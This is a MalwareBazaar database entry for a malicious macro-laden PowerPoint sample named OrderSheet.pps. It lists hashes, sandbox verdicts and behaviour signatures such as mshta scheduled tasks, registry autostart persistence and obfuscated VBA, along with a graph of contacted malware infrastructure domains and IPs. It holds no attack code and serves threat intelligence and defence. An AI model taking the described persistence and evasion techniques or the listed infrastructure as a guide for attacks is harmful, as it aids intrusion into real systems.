MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 c45ecb10594b32cb49ec4e3356acd59b2e0819555c747657a7ce45993e5e57d7. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 8


Intelligence 8 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: c45ecb10594b32cb49ec4e3356acd59b2e0819555c747657a7ce45993e5e57d7
SHA3-384 hash: b2c67093aab4b1c813379e2dd76b8118db4abcdea21891d95f996465c902e76110737c232b63f81b42e60ce07b989f18
SHA1 hash: 7b5672c1febeca9bc97d17951b57c9f59f9de708
MD5 hash: 04772bbc01d2088b18a869755d93b9d0
humanhash: oxygen-juliet-india-golf
File name:OrderSheet.pps
Download: download sample
File size:114'176 bytes
First seen:2021-04-06 10:19:20 UTC
Last seen:2021-04-06 11:08:41 UTC
File type:PowerPoint file ppt
MIME type:application/vnd.ms-powerpoint
ssdeep 3072:uRzJsj+VgF7YwTQqXe7o5pKoYTExtwQvgoO4Ndgd6xj:0sNJ
TLSH ADB3D71CB581C92FC3990A328D9EEEF6A2257D447DC6622B7750B3BE1F3BF249642504
Reporter madjack_red

Intelligence

File Origin
# of uploads :
2
# of downloads :
169
Origin country :
n/a
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
OrderSheet.pps
Verdict:
Malicious activity
Analysis date:
2021-04-05 06:29:42 UTC
Tags:
rat nanocore trojan agenttesla
Link:
https://app.any.run/tasks/278eb64b-1d8a-4dd3-a922-82022717078b

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection(s):
TwinWave.EvilDoc.PPTWANNABEBALLERSHolidayOnTheMoonPolicyKillz.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating a window
Result
Verdict:
Malicious
File Type:
Legacy PowerPoint File with Macro
Link:
https://app.docguard.net/c45ecb10594b32cb49ec4e3356acd59b2e0819555c747657a7ce45993e5e57d7/results/dashboard
Result
Verdict:
MALICIOUS
Link:
https://labs.inquest.net/dfi/sha256/c45ecb10594b32cb49ec4e3356acd59b2e0819555c747657a7ce45993e5e57d7
Result
Threat name:
Unknown
Detection:
malicious
Classification:
expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/667431
Signature
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with hexadecimal encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Multi AV Scanner detection for submitted file
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Uses schtasks.exe or at.exe to add and modify task schedules
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 382644 Sample: OrderSheet.pps Startdate: 06/04/2021 Architecture: WINDOWS Score: 100 57 www.blogger.com 2->57 59 resources.blogblog.com 2->59 61 4 other IPs or domains 2->61 87 Multi AV Scanner detection for submitted file 2->87 89 Sigma detected: Powershell execute code from registry 2->89 91 Sigma detected: Schedule script from internet via mshta 2->91 93 7 other signatures 2->93 10 cmd.exe 1 2->10         started        12 taskeng.exe 2->12         started        14 mshta.exe 2->14         started        16 7 other processes 2->16 signatures3 process4 dnsIp5 19 POWERPNT.EXE 8 10 10->19         started        21 mshta.exe 12->21         started        23 powershell.exe 14->23         started        51 archive.org 207.241.224.2, 443, 49179, 49184 INTERNET-ARCHIVEUS United States 16->51 53 ia801407.us.archive.org 207.241.228.147, 443, 49180, 49186 INTERNET-ARCHIVEUS United States 16->53 55 10 other IPs or domains 16->55 26 powershell.exe 16->26         started        28 powershell.exe 16->28         started        process6 dnsIp7 30 mshta.exe 13 42 19->30         started        34 mshta.exe 21->34         started        63 ia801407.us.archive.org 23->63 65 archive.org 23->65 67 ia801407.us.archive.org 26->67 69 archive.org 26->69 process8 dnsIp9 71 j.mp 67.199.248.17, 49165, 80 GOOGLE-PRIVATE-CLOUDUS United States 30->71 73 blogspot.l.googleusercontent.com 172.217.23.33, 443, 49166, 49182 GOOGLEUS United States 30->73 81 3 other IPs or domains 30->81 95 Creates autostart registry keys with suspicious values (likely registry only malware) 30->95 97 Creates multiple autostart registry keys 30->97 99 Creates an autostart registry key pointing to binary in C:\Windows 30->99 101 3 other signatures 30->101 36 powershell.exe 6 30->36         started        38 schtasks.exe 30->38         started        40 taskkill.exe 30->40         started        42 taskkill.exe 30->42         started        75 www.blogger.com 34->75 77 resources.blogblog.com 34->77 79 getyournewblog.blogspot.com 34->79 44 powershell.exe 34->44         started        signatures10 process11 process12 46 mshta.exe 14 36->46         started        49 mshta.exe 44->49         started        dnsIp13 83 onedriveupdate.net 104.21.68.120, 443, 49177, 49201 CLOUDFLARENETUS United States 46->83 85 172.67.195.85, 443, 49208, 49229 CLOUDFLARENETUS United States 49->85
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/c45ecb10594b32cb49ec4e3356acd59b2e0819555c747657a7ce45993e5e57d7/
Threat name:
Script-Macro.Trojan.Valyria
Create hunting rule
Status:
Malicious
First seen:
2021-04-03 08:17:13 UTC
AV detection:
16 of 29 (55.17%)
Threat level:
  5/5
Result
Malware family:
n/a
Score:
  8/10
Tags:
macro macro_on_action
Link:
https://tria.ge/reports/210406-ymvpf35thx/
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/c45ecb10594b32cb49ec4e3356acd59b2e0819555c747657a7ce45993e5e57d7

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Comments